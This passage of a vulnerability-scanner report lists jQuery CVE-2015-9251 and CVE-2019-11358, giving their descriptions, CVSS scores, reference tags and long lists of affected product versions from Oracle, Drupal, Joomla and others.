PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/ info - http://research.insecurelabs.org/jquery/test/ info - https://bugs.jquery.com/ticket/11974 info - https://github.com/advisories/GHSA-rmxg-73gg-4p98 info - https://github.com/jquery/jquery/issues/2432 info - https://nvd.nist.gov/vuln/detail/CVE-2015-9251 Vulnerable Software & Versions (NVD):
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.0.0 cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:* versions up to (excluding) 7.0.0.1 cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:* versions up to (excluding) 6.1.0.4.0 cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:* versions up to (excluding) 7.2 cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.1; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:* versions from (including) 4.3.0.1; versions up to (including) 4.3.0.4 cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:* CVE-2019-11358 suppress
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/ info - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b info - https://nvd.nist.gov/vuln/detail/CVE-2019-11358 Vulnerable Software & Versions (NVD):
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.11.0; versions up to (excluding) 1.11.9 cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.12.0; versions up to (excluding) 1.12.6 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.66 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.5.0; versions up to (excluding) 8.5.15 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (excluding) 8.6.15 cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (including) 3.9.4 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 19.1 cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.0; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* 